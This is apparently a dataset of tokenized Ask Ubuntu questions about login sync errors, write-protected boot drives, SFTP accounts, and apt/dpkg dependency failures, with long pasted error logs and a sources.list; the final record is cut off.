420647	error auth failed ( auth_failed ) ubuntu 12.04	my computer died , so i got a new computer exact same model and specs , and just installed my old hard drive with all my work and data . the problem is with ubuntu one which starts automatically to sync my files ; it now give an error ( auth failed ( auth_failed ) ) . how can i let it accept my new computer ? thanks george
420649	boot ubuntu server 10.04 off a write-protected hard drive	so as the title implies , i need to be able to boot off a write-protected hard drive . whenever the hard drive is set to write-protected mode ( after installation of server and other file updates ) , we get mount errors and an unusable system . i 'm no linux guru and google has n't provided the answers as of this evening . if anyone has some insight/direction into what needs to be done to make ubuntu server 10.04 run without the need to write to the hard drive , please help ! here is what gets displayed on the screen ( i had to transcribe this from another screen so bear with me on any typos or abbreviations ) . in this case , we are using an usb stick that has a write-protect switch on it . fsck from util-linux-ng 2.17.2 fsck from util-linux-ng 2.17.2 e2fsck 1.41.11 ( 14-mar-2010 ) e2fsck 1.41.11 ( 14-mar-2010 ) fsck.ext : read-only file system while trying to open /dev/sdb1 disk write-protected : use the -n option to do a read-only check of the device . /dev/mapper/f15pad-root : clean , 47169/95040 files , 179595/379904 blocks mountall : fsck /boot [ 424 ] terminated with status 0 mountall : unrecoverable fsck error : /boot serious errors were found while checking the disk drive for /boot press i to ignore , s to skip mounting or m for manual recovery [ 13.296604 ] end_request : i/o error , dev sdb , sector 817536 [ ... ] buffer i/o error on device dm-2 , logical block 39424 [ ... ] end_request : i/o error , dev sdb , sector 1550720 [ ... ] buffer i/o error on device dm-2 , logical block 131072 [ ... ] jbd2 : i/o error detected when updating journal superblock for dm-2-8 [ ... ] end_request : i/o error , dev sdb , sector 1550728 [ ... ] aborting journal on device dm-2-8 [ ... ] end_request : i/o error , dev sdb , sector 1550728 [ ... ] buffer i/o error on device dm-2 , logical block 131072 [ ... ] jbd2 : i/o error detected when updating journal superblock for dm-2-8 [ ... ] ext4-fs error ( device dm-2 ) : ext4_hournal_start_sb : detected aborted journal [ ... ] ext4-fs ( dm-2 ) : remounting filesystem read-only [ ... ] ext4-fs ( dm-2 ) : ext4_da_writepages : jbd2_start : 1023 pages , ino 47171 ; err -30
420652	how to set up ubuntu sftp server ?	i would like to know how to set up root , sudo , sftp-only user accounts which wo n't be required public key authentication at log in . i would also like to know how to set up sftp-only users ' home directories where they ca n't access upper level other directories .
420656	dual os setup on a bootable flash drive ?	i know how to create a bootable flash drive with an operating system , but i would like both ubuntu 12.04 and linux mint 16 cinnamon to be bootable from one flash drive . is this possible , and if so how would i do it ?
420658	can not watch video with ubuntu	i can not watch video on my computer ; intel core 2 , 1.50 ghz x2 mem . 1.9 gib , os 64 bit , graphics intel 965gm , firefox 27.0 , ubuntu 13.10 . i need to install adobe flash player for linux 64 bit . i have 3 choices to download and those files are in ''read only '' format . can you help ?
420662	exception : can not get content of ubiquity-frontend-gtk error running python rtupdate hook ubiquity-frontend-gtk	today , i upgraded my desktop from 13.04 to 13.10 and ended up with the following : $ sudo apt-get upgrade reading package lists ... building dependency tree ... reading state information ... the following packages have been kept back : libxfce4ui-1-0 libxfce4ui-utils parole xfce-keyboard-shortcuts xfce4-settings xfce4-xkb-plugin xfdesktop4 xfdesktop4-data xfwm4 0 upgraded , 0 newly installed , 0 to remove and 9 not upgraded . 77 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up python3 ( 3.3.2-14ubuntu1 ) ... running python rtupdate hooks for python3.3 ... dpkg-query : package 'ubiquity-frontend-gtk ' is not installed use dpkg -- info ( = dpkg-deb -- info ) to examine archive files , and dpkg -- contents ( = dpkg-deb -- contents ) to list their contents . traceback ( most recent call last ) : file `` /usr/bin/py3clean '' , line 200 , in < module > main ( ) file `` /usr/bin/py3clean '' , line 186 , in main pfiles = set ( dpf.from_package ( options.package ) ) file `` /usr/share/python3/debpython/files.py '' , line 53 , in from_package raise exception ( `` can not get content of % s '' % package_name ) exception : can not get content of ubiquity-frontend-gtk error running python rtupdate hook ubiquity-frontend-gtk dpkg-query : package 'ubiquity ' is not installed use dpkg -- info ( = dpkg-deb -- info ) to examine archive files , and dpkg -- contents ( = dpkg-deb -- contents ) to list their contents . traceback ( most recent call last ) : file `` /usr/bin/py3clean '' , line 200 , in < module > main ( ) file `` /usr/bin/py3clean '' , line 186 , in main pfiles = set ( dpf.from_package ( options.package ) ) file `` /usr/share/python3/debpython/files.py '' , line 53 , in from_package raise exception ( `` can not get content of % s '' % package_name ) exception : can not get content of ubiquity error running python rtupdate hook ubiquity dpkg : error processing python3 ( -- configure ) : subprocess installed post-installation script returned error exit status 4 dpkg : dependency problems prevent configuration of python3-apt : python3-apt depends on python3 ( > = 3.3 ) ; however : package python3 is not configured yet . python3-apt depends on python3 ( < < 3.4 ) ; however : package python3 is not configured yet . dpkg : error processing python3-apt ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of python3-dbus : python3-dbus depends on python3 ( > = 3.3 ) ; however : package python3 is not configured yet . python3-dbus depends on python3 ( < < 3.4 ) ; however : package python3 is not configured yet . dpkg : error processing python3-dbus ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of language-selector-common : language-selector-common depends on python3 ( > = 3.2 ) ; however : package python3 is not configured yet . language-selector-common depends on python3 : any ( > = 3.2.3-3~ ) ; however : package python3 is not configured yet . language-selector-common depends on python3-apt ( > = 0.7.12.0 ) ; however : package python3-apt is not configured yet . language-selector-common depends on python3-dbus ; however : package python3-dbus is not configured yet . dpkg : error processing language-selector-common ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python3-gi : python3-gi depends on python3 ( < < 3.4 ) ; however : package python3 is not configured yet . python3-gi depends on python3 : any ( > = 3.3.2-2~ ) ; however : package python3 is not configured yet . python3-gi depends on python3 ( > = 3.3 ) ; however : package python3 is not configured yet . dpkg : error processing python3-gi ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of ubuntu-drivers-common : ubuntu-drivers-common depends on python3 ( > = 3.2.3-3~ ) ; however : package python3 is not configured yet . ubuntu-drivers-common depends on python3-apt ; however : package python3-apt is not configured yet . dpkg : error processing ubuntu-drivers-common ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of update-notifier-common : update-notifier-common depends on python3 : any ; however : package python3 is not configured yet . update-notifier-common depends on python3-apt ; however : package python3-apt is not configured yet . dpkg : error processing update-notifier-common ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of lsb-release : lsb-release depends on python3 ( > = 3.2.3-3~ ) ; however : package python3 is not configured yet . dpkg : error processing lsb-release ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of ubuntu-minimal : ubuntu-minimal depends on lsb-release ; however : package lsb-release is not configured yet . ubuntu-minimal depends on python3 ; however : package python3 is not configured yet . dpkg : error processing ubuntu-minimal ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of apparmor : apparmor depends on python3 ; however : package python3 is not configured yet . dpkg : error processing apparmor ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python3-commandnotfound : python3-commandnotfound depends on lsb-release ; however : package lsb-release is not configured yet . python3-commandnotfound depends on python3-apt ; however : package python3-apt is not configured yet . python3-commandnotfound depends on python3 ( > = 3.2.3-3~ ) ; however : package python3 is not configured yet . dpkg : error processing python3-commandnotfound ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of command-not-found : command-not-found depends on python3-commandnotfound ( > = 0.3ubuntu7 ) ; however : package python3-commandnotfound is not configured yet . dpkg : error processing command-not-found ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python3-distupgrade : python3-distupgrade depends on python3 : any ( > = 3.3.2-2~ ) ; however : package python3 is not configured yet . python3-distupgrade depends on python3-apt ( > = 0.8.5~ ) ; however : package python3-apt is not configured yet . python3-distupgrade depends on lsb-release ; however : package lsb-release is not configured yet . dpkg : error processing python3-distupgrade ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python3-update-manager : python3-update-manager depends on python3 : any ( > = 3.3.2-2~ ) ; however : package python3 is not configured yet . python3-update-manager depends on python3-apt ( > = 0.8.5~ ) ; however : package python3-apt is not configured yet . python3-update-manager depends on python3-distupgrade ; however : package python3-distupgrade is not configured yet . python3-update-manager depends on lsb-release ; however : package lsb-release is not configured yet . dpkg : error processing python3-update-manager ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of ubuntu-release-upgrader-core : ubuntu-release-upgrader-core depends on python3 : any ( > = 3.2 ) ; however : package python3 is not configured yet . ubuntu-release-upgrader-core depends on python3 ; however : package python3 is not configured yet . ubuntu-release-upgrader-core depends on python3-distupgrade ( = 1:0.205.4 ) ; however : package python3-distupgrade is not configured yet . dpkg : error processing ubuntu-release-upgrader-core ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of ubuntu-standard : ubuntu-standard depends on language-selector-common ; however : package language-selector-common is not configured yet . dpkg : error processing ubuntu-standard ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of ufw : ufw depends on python3 ( > = 3.2.3-3~ ) ; however : package python3 is not configured yet . dpkg : error processing ufw ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of update-manager-core : update-manager-core depends on python3 : any ( > = 3.2 ) ; however : package python3 is not configured yet . update-manager-core depends on python3 ; however : package python3 is not configured yet . update-manager-core depends on python3-update-manager ( = 1:0.194.1 ) ; however : package python3-update-manager is not configured yet . update-manager-core depends on lsb-release ; however : package lsb-release is not configured yet . update-manager-core depends on ubuntu-release-upgrader-core ; however : package ubuntu-release-upgrader-core is not configured yet . dpkg : error processing update-manager-core ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gnome-menus : gnome-menus depends on python3 ; however : package python3 is not configured yet . gnome-menus depends on python3 : any ( > = 3.1 ) ; however : package python3 is not configured yet . dpkg : error processing gnome-menus ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of alacarte : alacarte depends on gnome-menus ( > = 3.5.3 ) ; however : package gnome-menus is not configured yet . dpkg : error processing alacarte ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python3-problem-report : python3-problem-report depends on python3 : any ( > = 3.3.2-2~ ) ; however : package python3 is not configured yet . dpkg : error processing python3-problem-report ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python3-apport : python3-apport depends on python3 : any ( > = 3.3.2-2~ ) ; however : package python3 is not configured yet . python3-apport depends on python3-apt ( > = 0.7.9 ) ; however : package python3-apt is not configured yet . python3-apport depends on python3-problem-report ( > = 0.94 ) ; however : package python3-problem-report is not configured yet . python3-apport depends on lsb-release ; however : package lsb-release is not configured yet . dpkg : error processing python3-apport ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of apport : apport depends on python3 ; however : package python3 is not configured yet . apport depends on python3-apport ( > = 2.12.5-0ubuntu2.2 ) ; however : package python3-apport is not configured yet . apport depends on python3-gi ; however : package python3-gi is not configured yet . dpkg : error processing apport ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of apport-gtk : apport-gtk depends on python3 ; however : package python3 is not configured yet . apport-gtk depends on python3-apport ( > = 2.12.5-0ubuntu2.2 ) ; however : package python3-apport is not configured yet . apport-gtk depends on python3-gi ; however : package python3-gi is not configured yet . apport-gtk depends on apport ( > = 0.41 ) ; however : package apport is not configured yet . dpkg : error processing apport-gtk ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of apparmor-easyprof : apparmor-easyprof depends on python3 ; however : package python3 is not configured yet . apparmor-easyprof depends on python3 : any ( > = 3.3.2-2~ ) ; however : package python3 is not configured yet . dpkg : error processing apparmor-easyprof ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of dh-apparmor : dh-apparmor depends on apparmor-easyprof ; however : package apparmor-easyprof is not configured yet . dpkg : error processing dh-apparmor ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of debhelper : debhelper depends on dh-apparmor ; however : package dh-apparmor is not configured yet . dpkg : error processing debhelper ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of devhelp-common : devhelp-common depends on python3 ( > = 3.2.3-3~ ) ; however : package python3 is not configured yet . dpkg : error processing devhelp-common ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libdevhelp-3-2 : libdevhelp-3-2 depends on devhelp-common ( > = 3.8.2-2 ) ; however : package devhelp-common is not configured yet . dpkg : error processing libdevhelp-3-2 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of devhelp : devhelp depends on libdevhelp-3-2 ( > = 3.6.1 ) ; however : package libdevhelp-3-2 is not configured yet . dpkg : error processing devhelp ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of firefox : firefox depends on lsb-release ; however : package lsb-release is not configured yet . dpkg : error processing firefox ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of flashplugin-installer : flashplugin-installer depends on update-notifier-common ( > = 0.119ubuntu2 ) ; however : package update-notifier-common is not configured yet . dpkg : error processing flashplugin-installer ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of foomatic-db-compressed-ppds : foomatic-db-compressed-ppds depends on python3 ; however : package python3 is not configured yet . dpkg : error processing foomatic-db-compressed-ppds ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of gnome-control-center : gnome-control-center depends on gnome-menus ( > = 2.12.0 ) ; however : package gnome-menus is not configured yet . dpkg : error processing gnome-control-center ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of kde-runtime : kde-runtime depends on language-selector-common ; however : package language-selector-common is not configured yet . dpkg : error processing kde-runtime ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of qapt-batch : qapt-batch depends on kde-runtime ; however : package kde-runtime is not configured yet . dpkg : error processing qapt-batch ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of kubuntu-debug-installer : kubuntu-debug-installer depends on kde-runtime ; however : package kde-runtime is not configured yet . kubuntu-debug-installer depends on qapt-batch ; however : package qapt-batch is not configured yet . dpkg : error processing kubuntu-debug-installer ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of software-center-aptdaemon-plugins : software-center-aptdaemon-plugins depends on python3-gi ; however : package python3-gi is not configured yet . dpkg : error processing software-center-aptdaemon-plugins ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python3-pkg-resources : python3-pkg-resources depends on python3 ( > = 3.2 ) ; however : package python3 is not configured yet . python3-pkg-resources depends on python3 ( < < 3.4 ) ; however : package python3 is not configured yet . dpkg : error processing python3-pkg-resources ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python3-aptdaemon : python3-aptdaemon depends on python3 : any ( > = 3.3.2-2~ ) ; however : package python3 is not configured yet . python3-aptdaemon depends on python3-apt ( > = 0.8.5~ubuntu1 ) ; however : package python3-apt is not configured yet . python3-aptdaemon depends on python3-dbus ; however : package python3-dbus is not configured yet . python3-aptdaemon depends on python3-gi ; however : package python3-gi is not configured yet . python3-aptdaemon depends on python3-pkg-resources ; however : package python3-pkg-resources is not configured yet . dpkg : error processing python3-aptdaemon ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of aptdaemon : aptdaemon depends on python3 : any ( > = 3.2 ) ; however : package python3 is not configured yet . aptdaemon depends on python3-aptdaemon ( = 1.1.1-0ubuntu4 ) ; however : package python3-aptdaemon is not configured yet . aptdaemon depends on python3-gi ; however : package python3-gi is not configured yet . dpkg : error processing aptdaemon ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python3-aptdaemon.gtk3widgets : python3-aptdaemon.gtk3widgets depends on python3 : any ( > = 3.3.2-2~ ) ; however : package python3 is not configured yet . python3-aptdaemon.gtk3widgets depends on python3-aptdaemon ( = 1.1.1-0ubuntu4 ) ; however : package python3-aptdaemon is not configured yet . python3-aptdaemon.gtk3widgets depends on python3-gi ; however : package python3-gi is not configured yet . dpkg : error processing python3-aptdaemon.gtk3widgets ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of language-selector-gnome : language-selector-gnome depends on language-selector-common ( = 0.116 ) ; however : package language-selector-common is not configured yet . language-selector-gnome depends on python3 ( > = 3.2 ) ; however : package python3 is not configured yet . language-selector-gnome depends on python3 : any ( > = 3.2.3-3~ ) ; however : package python3 is not configured yet . language-selector-gnome depends on python3-gi ; however : package python3-gi is not configured yet . language-selector-gnome depends on python3-apt ; however : package python3-apt is not configured yet . language-selector-gnome depends on aptdaemon ( > = 0.40+bzr527 ) ; however : package aptdaemon is not configured yet . language-selector-gnome depends on python3-aptdaemon.gtk3widgets ; however : package python3-aptdaemon.gtk3widgets is not configured yet . dpkg : error processing language-selector-gnome ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of nvidia-common : nvidia-common depends on ubuntu-drivers-common ; however : package ubuntu-drivers-common is not configured yet . dpkg : error processing nvidia-common ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of screen-resolution-extra : screen-resolution-extra depends on python3-gi ; however : package python3-gi is not configured yet . dpkg : error processing screen-resolution-extra ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of nvidia-settings-304 : nvidia-settings-304 depends on screen-resolution-extra ( > = 0.12 ) ; however : package screen-resolution-extra is not configured yet . dpkg : error processing nvidia-settings-304 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python3-cairo : python3-cairo depends on python3 ( > = 3.2.3-3~ ) ; however : package python3 is not configured yet . dpkg : error processing python3-cairo ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python3-gi-cairo : python3-gi-cairo depends on python3 ( < < 3.4 ) ; however : package python3 is not configured yet . python3-gi-cairo depends on python3 ( > = 3.3 ) ; however : package python3 is not configured yet . python3-gi-cairo depends on python3-gi ( = 3.10.0-1ubuntu1 ) ; however : package python3-gi is not configured yet . python3-gi-cairo depends on python3-cairo ( > = 1.10.0+dfsg-3~exp2 ) ; however : package python3-cairo is not configured yet . dpkg : error processing python3-gi-cairo ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of onboard : onboard depends on python3 ( > = 3.3 ) ; however : package python3 is not configured yet . onboard depends on python3 ( < < 3.4 ) ; however : package python3 is not configured yet . onboard depends on python3-cairo ; however : package python3-cairo is not configured yet . onboard depends on python3-gi-cairo ; however : package python3-gi-cairo is not configured yet . onboard depends on python3-dbus ; however : package python3-dbus is not configured yet . dpkg : error processing onboard ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of onboard-data : onboard-data depends on onboard ( > = 0.99.0~alpha1~tr1507 ) ; however : package onboard is not configured yet . dpkg : error processing onboard-data ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of openprinting-ppds : openprinting-ppds depends on python3 ; however : package python3 is not configured yet . dpkg : error processing openprinting-ppds ( -- configure ) : dependency problems - leaving unconfigured dpkg : too many errors , stopping no apport report written because maxreports is reached already errors were encountered while processing : python3 python3-apt python3-dbus language-selector-common python3-gi ubuntu-drivers-common update-notifier-common lsb-release ubuntu-minimal apparmor python3-commandnotfound command-not-found python3-distupgrade python3-update-manager ubuntu-release-upgrader-core ubuntu-standard ufw update-manager-core gnome-menus alacarte python3-problem-report python3-apport apport apport-gtk apparmor-easyprof dh-apparmor debhelper devhelp-common libdevhelp-3-2 devhelp firefox flashplugin-installer foomatic-db-compressed-ppds gnome-control-center kde-runtime qapt-batch kubuntu-debug-installer software-center-aptdaemon-plugins python3-pkg-resources python3-aptdaemon aptdaemon python3-aptdaemon.gtk3widgets language-selector-gnome nvidia-common screen-resolution-extra nvidia-settings-304 python3-cairo python3-gi-cairo onboard onboard-data openprinting-ppds processing was halted because there were too many errors . e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any idea how to fix these ?
420664	error while installing packages	i 'm using ubuntu 12.04 . i 'm encountering error in installing any package using apt-get . i 've tried steps given in various forums , but could n't resolve the error . for example , if i install kcachegrind , the error code is : [ i 've replaced http : // with http// just to avoid links in posting the question . so , please read http// as http : // in the code segments . ] lap471 @ admin : ~/bin $ sudo apt-get install kcachegrind reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : kcachegrind : depends : kde-runtime but it is not going to be installed depends : libkdecore5 ( > = 4:4.4.0 ) but it is not going to be installed depends : libkdeui5 ( > = 4:4.3.4 ) but it is not going to be installed depends : libkio5 ( > = 4:4.3.4 ) but it is not going to be installed recommends : valgrind but it is not going to be installed recommends : graphviz but it is not going to be installed libcairo-perl : depends : perlapi-5.14.2 libdbi-perl : depends : perlapi-5.14.2 libglib-perl : depends : perlapi-5.14.2 libgtk2-perl : depends : perlapi-5.14.2 libpango-perl : depends : perlapi-5.14.2 libperl5.14 : depends : perl-base ( = 5.14.2-6ubuntu2.4 ) but 5.10.0-24ubuntu4 is to be installed libterm-readkey-perl : depends : perlapi-5.14.2 libtext-charwidth-perl : depends : perl-base ( > = 5.14.2-3 ) but 5.10.0-24ubuntu4 is to be installed depends : perlapi-5.14.2 libtext-iconv-perl : depends : perl-base ( > = 5.14.2-6 ) but 5.10.0-24ubuntu4 is to be installed depends : perlapi-5.14.2 libuuid-perl : depends : perl-base ( > = 5.14.2-6ubuntu1 ) but 5.10.0-24ubuntu4 is to be installed depends : perlapi-5.14.2 perl : depends : perl-base ( = 5.14.2-6ubuntu2.4 ) but 5.10.0-24ubuntu4 is to be installed e : unmet dependencies.enter code here try 'apt-get -f install ' with no packages ( or specify a solution ) . if i try sudo apt-get -f install , there is still an error : lap471 @ admin : ~/bin $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : libsensors3 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libdbd-mysql-perl liblocale-gettext-perl libmysqlclient18 mysql-client-5.5 mysql-client-core-5.5 mysql-common mysql-server mysql-server-5.5 mysql-server-core-5.5 perl-base suggested packages : tinyca mailx the following packages will be removed : mysql-client-5.1 mysql-server-5.1 mysql-server-core-5.1 the following new packages will be installed : libmysqlclient18 mysql-client-5.5 mysql-client-core-5.5 mysql-server-5.5 mysql-server-core-5.5 the following packages will be upgraded : libdbd-mysql-perl liblocale-gettext-perl mysql-common mysql-server perl-base 5 upgraded , 5 newly installed , 3 to remove and 553 not upgraded . 13 not fully installed or removed . need to get 0 b/27.1 mb of archives . after this operation , 43.4 mb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! mysql-client-core-5.5 mysql-client-5.5 mysql-server-core-5.5 mysql-common mysql-server mysql-server-5.5 libmysqlclient18 libdbd-mysql-perl perl-base liblocale-gettext-perl install these packages without verification [ y/n ] ? y /usr/bin/perl : symbol lookup error : /usr/lib/perl5/auto/text/iconv/iconv.so : undefined symbol : perl_xs_apiversion_bootcheck ( reading database ... 147200 files and directories currently installed . ) unpacking mysql-client-core-5.5 ( from ... /mysql-client-core-5.5_5.5.35-0ubuntu0.12.04.2_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/mysql-client-core-5.5_5.5.35-0ubuntu0.12.04.2_i386.deb ( -- unpack ) : trying to overwrite '/usr/share/man/man1/mysqlcheck.1.gz ' , which is also in package mysql-client-5.1 5.1.37-1ubuntu5.5 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/mysql-client-core-5.5_5.5.35-0ubuntu0.12.04.2_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the sources.list file is : lap471 @ admin : ~/bin $ cat /etc/apt/sources.list # deb cdrom : [ ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) ] / precise main restricted # see http//help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http//in.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http//in.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http//in.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http//in.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http//in.archive.ubuntu.com/ubuntu/ precise universe deb-src http//in.archive.ubuntu.com/ubuntu/ precise universe deb http//in.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http//in.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http//in.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http//in.archive.ubuntu.com/ubuntu/ precise multiverse deb http//in.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http//in.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http//in.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http//in.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http//security.ubuntu.com/ubuntu precise-security main restricted deb-src http//security.ubuntu.com/ubuntu precise-security main restricted deb http//security.ubuntu.com/ubuntu precise-security universe deb-src http//security.ubuntu.com/ubuntu precise-security universe deb http//security.ubuntu.com/ubuntu precise-security multiverse deb-src http//security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http//archive.canonical.com/ubuntu precise partner # deb-src http//archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http//extras.ubuntu.com/ubuntu precise main deb-src http//extras.ubuntu.com/ubuntu precise main deb http//archive.canonical.com/ precise partner deb-src http//archive.canonical.com/ precise partner and the sources.list.d/* contains : lap471 @ admin : ~/bin $ cat /etc/apt/sources.list.d/* # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http//dl.google.com/linux/chrome/deb/ stable main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http//dl.google.com/linux/chrome/deb/ stable main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http//dl.google.com/linux/talkplugin/deb/ stable main # needed sources vor php5.2 : deb http//old-releases.ubuntu.com/ubuntu/ karmic main restricted deb-src http//old-releases.ubuntu.com/ubuntu/ karmic main restricted deb http//old-releases.ubuntu.com/ubuntu/ karmic-updates main restricted deb-src http//old-releases.ubuntu.com/ubuntu/ karmic-updates main restricted deb http//old-releases.ubuntu.com/ubuntu/ karmic universe deb-src http//old-releases.ubuntu.com/ubuntu/ karmic universe deb http//old-releases.ubuntu.com/ubuntu/ karmic-updates universe deb-src http//old-releases.ubuntu.com/ubuntu/ karmic-updates universe deb http//old-releases.ubuntu.com/ubuntu/ karmic multiverse deb-src http//old-releases.ubuntu.com/ubuntu/ karmic multiverse deb http//old-releases.ubuntu.com/ubuntu/ karmic-updates multiverse deb-src http//old-releases.ubuntu.com/ubuntu/ karmic-updates multiverse deb http//old-releases.ubuntu.com/ubuntu karmic-security main restricted deb-src http//old-releases.ubuntu.com/ubuntu karmic-security main restricted deb http//old-releases.ubuntu.com/ubuntu karmic-security universe deb-src http//old-releases.ubuntu.com/ubuntu karmic-security universe deb http//old-releases.ubuntu.com/ubuntu karmic-security multiverse deb-src http//old-releases.ubuntu.com/ubuntu karmic-security multiverse # needed sources vor php5.2 : deb http//old-releases.ubuntu.com/ubuntu/ karmic main restricted deb-src http//old-releases.ubuntu.com/ubuntu/ karmic main restricted deb http//old-releases.ubuntu.com/ubuntu/ karmic-updates 